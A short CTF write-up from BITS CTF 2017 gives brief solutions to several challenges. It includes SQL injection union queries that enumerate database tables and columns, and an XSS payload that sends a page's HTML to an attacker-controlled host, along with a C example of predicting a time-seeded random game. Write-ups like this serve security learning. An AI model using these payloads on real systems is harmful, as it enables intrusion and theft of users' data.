BITS CTF 2017 WriteUp

I participated in BITS CTF a little.
I solved these problems:


  • [10] BotBot
  • [30] Batman vs Joker
  • [60] Message to the Admin


  • [60] Sherlock


  • [20] Command_Line
  • [30] Random Game

[10] BotBot

Access the page and view the source.

<!-- Nothing to see here. Maybe try looking up seo .txt -->

So, look at robots.txt.

Useragent *
Disallow: /fl4g

The flag is in /fl4g.


[30] Batman vs Joker

You'll find an SQL injection.

' order by 2; -- # is OK,
' order by 3; -- # is bad.
So the query returns 2 columns.

With this query, you can get all table names, and a Joker table will be among them.
' union select 'A',concat(table_name, ',') from information_schema.tables; -- #

Next, let's get the column names of Joker.

'union select 'A', column_name from information_schema.columns where table_name = 'Joker'; -- #

The columns are Flag and HaHaHa.
The flag is there.


[60] Message to the Admin

Send this payload.
"><script>document.location.href='http://<yours>/?'+document.body.innerHTML </script>
You'll then receive the flag along with the HTML body.


[60] Sherlock

Just do it.
Parse with this script.


[20] Command_Line

An x64 binary is given.
Just do it.


[30] Random Game

An x64 binary is given.
Win a number game 30 times. The seed is the value of time(), and we have to answer correctly 30 times.
The value we have to answer is generated with rand() & 15.

The flag is :
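
The weakness described above, as an added example (not the challenge binary's code and not the author's solver): a sequence seeded with time() can be reproduced by anyone who knows the clock to within a few seconds. The function names, the sample seed and the /dev/urandom-based replacement are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ROUNDS 30

/* The game's logic as the write-up describes it: seed once, then rand() & 15. */
static void game_answers(unsigned int seed, int out[ROUNDS]) {
    srand(seed);
    for (int i = 0; i < ROUNDS; i++)
        out[i] = rand() & 15;
}

/* Try every seed within +/- window seconds of guess; return 1 if one of them
 * reproduces the first n observed answers. time() has one-second resolution,
 * so the search space is tiny. */
static int recover_seed(const int *observed, int n, unsigned int guess,
                        unsigned int window, unsigned int *found) {
    int cand[ROUNDS];
    for (unsigned int d = 0; d <= 2 * window; d++) {
        unsigned int s = guess - window + d;
        game_answers(s, cand);
        if (memcmp(cand, observed, (size_t)n * sizeof(int)) == 0) {
            *found = s;
            return 1;
        }
    }
    return 0;
}

/* Hardened draw: 4 bits from the OS CSPRNG; returns -1 if it is unavailable. */
static int secure_answer(void) {
    unsigned char b;
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t got = fread(&b, 1, 1, f);
    fclose(f);
    return got == 1 ? (b & 15) : -1;
}

int main(void) {
    unsigned int found = 0, seed = 1486200000u; /* constructed time() value */
    int observed[ROUNDS];
    game_answers(seed, observed);
    if (recover_seed(observed, ROUNDS, seed + 3, 5, &found)) /* clock 3 s off */
        printf("sequence reproduced with seed %u\n", found);
    printf("CSPRNG draw: %d\n", secure_answer());
    return 0;
}
```

The exact numbers rand() yields depend on the C library, but for a given library the sequence is fully determined by the seed, which is why values that must be unguessable should come from the operating system's CSPRNG instead.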

Posted by: ytn

A student of University of Tsukuba.

